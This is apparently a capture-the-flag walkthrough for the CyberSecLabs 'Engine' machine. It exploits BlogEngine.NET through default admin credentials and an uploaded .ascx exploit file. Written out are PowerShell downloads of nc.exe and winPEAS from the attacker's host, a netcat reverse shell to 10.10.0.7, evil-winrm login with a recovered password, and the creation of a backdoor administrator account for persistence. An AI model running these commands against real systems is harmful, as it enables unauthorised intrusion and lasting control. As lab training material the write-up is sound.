CyberSecLabs "ENGINE" Walkthrough - No Metasploit Version


Engine, a new Windows oriented machine from CyberSecLabs, is a neat examination of your ability to think simply, while utilizing some of the tools we have covered in our previous walkthroughs.  There are a few different paths to completing this challenge, and I will be showcasing a method that doesn't use Metasploit, while using Evil-Winrm rather than psexec or other tool.  So let's dig right in!

Scanning

As always we need to understand our target before we start poking at it.  Let's kick things off with a basic Nmap scan followed by the -A scan.

nmap 172.31.1.16

nmap -A 172.31.1.16

As you can see we have a web server running on port 80, SMB on 445, and RDP on 3389.  We can note that the machine's name is ENGINE for further reference.  Let's continue on.

Enumeration

We are going to start by checking out the webserver on Port 80, however we get a default page.

Default Windows IIS Webpage

This is actually a pretty common occurrence in a penetration test, and can oftentimes be running services within subdirectories.  We can check for the possibility of this using Dirsearch.
python3 dirsearch.py -u 172.31.1.16 -e php,cgi,txt,exe,html -x 400,401,403 -r -R 3

Dirsearch has successfully located additional directories, and in this case specifically the /blog directory.  Let's check that out in the browser now and see what we find.
172.31.1.16/blog

We can see a page named "Alex's Blog," which appears to be running BlogEngine.net.  Additionally, we can attempt to log in by clicking the login button in the submenu above.

 BlogEngine Login page for Alex's Blog

I attempted to use default credentials I found online, but they were unsuccessful.  However, trying the tried and true "admin:admin" worked, and we successfully gained access to the administrator dashboard.  Let's go back to the BlogEngine service we discovered earlier, and do some research.  Searchsploit shows the following results.

searchsploit blogengine

BlogEngine appears to be vulnerable to directory traversal and remote code execution.  Let's do some research and see if one of these exploits can help us gain access.  After some searching we do find that one of them (46353.cs) seems to fit our needs.

ExploitDB BlogEngine.NET 3.3.6 Exploit

Exploitation

Now that we have a possible exploit we need to figure out how to use it.  Fortunately this one is pretty straight forward.  We can copy it from our ExploitDB folder on Kali to our working directory and inspect it's requirements.

Copying 46353.cs from ExploitDB directory to our working directory

Information Modification

So there's a couple of things here.  First, we see in the bottom that we have to modify the IP address and port.  In the top we are instructed to save the file as "PostView.ascx" as this is the format that the BlogEngine service will recognize.  So modify as required, and save the file.  Once you've done this we can move ahead.
Now navigate through the dashboard to the edit menu for the one single post we can locate on the server.

Choose the post above

Click the File Manager button as shown above

From here you should see an upload button.  Select that, and upload your "PostView.ascx" file.
Uploading file

Now that the file is uploaded we need to navigate to the directory that we are shown in the exploit file.  But first, start a Netcat listener listening on the port we specified in the exploit.  If you've followed the instructions correctly, you should get a reverse shell when you visit the site.
Reverse Shell - http://172.31.1.16/blog/?theme=../../App_Data/files

You'll notice that the shell is funky and would benefit from an upgrade.  I do this by grabbing my Netcat binary using Powershell to get it from our Kali machine.  Remember to start your Python SimpleHTTPServer as well.

Bottom - python -m SimpleHTTPServer 8181; Top - powershell -c wget "http://10.10.0.7:8181/nc.exe" -outfile "nc.exe"

You can now start another Netcat listener on Kali, and run nc.exe from the target machine to connect back.  Let's do that now.
Bottom - nc -nlvp 5555; Top - nc.exe 10.10.0.7 5555 -e cmd.exe

Great! We now have a more stable shell. Unfortunately we find quickly that we do not have access privileges to the user or Admin folders.  We will need to escalate privileges.
User folder access denied

We can use various methods to determine ways to escalate.  In this case I used winPEAS.  Let's grab that from our Tools folder on our Kali machine and run it.
powershell -c wget "http://10.10.0.7:8181/winPEAS.exe" -outfile "winPEAS.exe"; winpeas.exe

We let winPEAS do it's thing, and once it's complete we can go through the results.  One thing sticks out, which is some default credentials that have been found hiding in registry.
Default Credentials Found

Now that we have what appears to be Administrator credentials we can attempt to log in with them.  Noting that we early found SMB running on the machine we can use psexec or, in the case of this walkthrough, Evil-WinRM.  
evil-winrm -i 172.31.1.16 -u administrator -p PzCEKhvj6gQMk7kA -s /root/Desktop/Tools

You'll notice that whoami returns administrator, which is what we hoped for.  Additionally, please make note of my use of the -s flag with the follow on directory.  This allows me you to run scripts and programs directly from the Tools directory on your Kali machine.  Neat trick!  Let's grab our flags quick.

access.txt and system.txt flags found

If you're here for just the flags, then congratulations!  You have completed the challenge and can submit the hashes to the CSL dashboard for the machine.  If you are interested in some basic post-exploitation, then please continue on.

Post Exploitation

Now that we have administrative access we can think about how we can provide continued access in the future.  As with previous guides, we can simply create a user and add them to the administrator group.  

net user themayor !Password!123 /add; net localgroup Administrators themayor /add

 We saw earlier that RDP is already enabled, so we don't need to enable it and can simply attempt to log in using XFreeRDP.

xfreerdp /u:themayor /p'!Password!123' /v:172.31.1.16

And we are successfully in the Server 2012 environment.  Open up the server manager quick to verify that we are in the Administrator's group and you're all set.  Make sure you contact the client if required in the rules of engagement and let them know you have compromised the server.

Final Thoughts

Engine is a really neat challenge that required us to exploit a common poor password vulnerability, and showed us the potential issues surrounding passwords being stored in the machine and being found with easy to use tools.  I hope this challenge has helped you (it's definitely helped me) and I will see you next time!



Comments

Popular Posts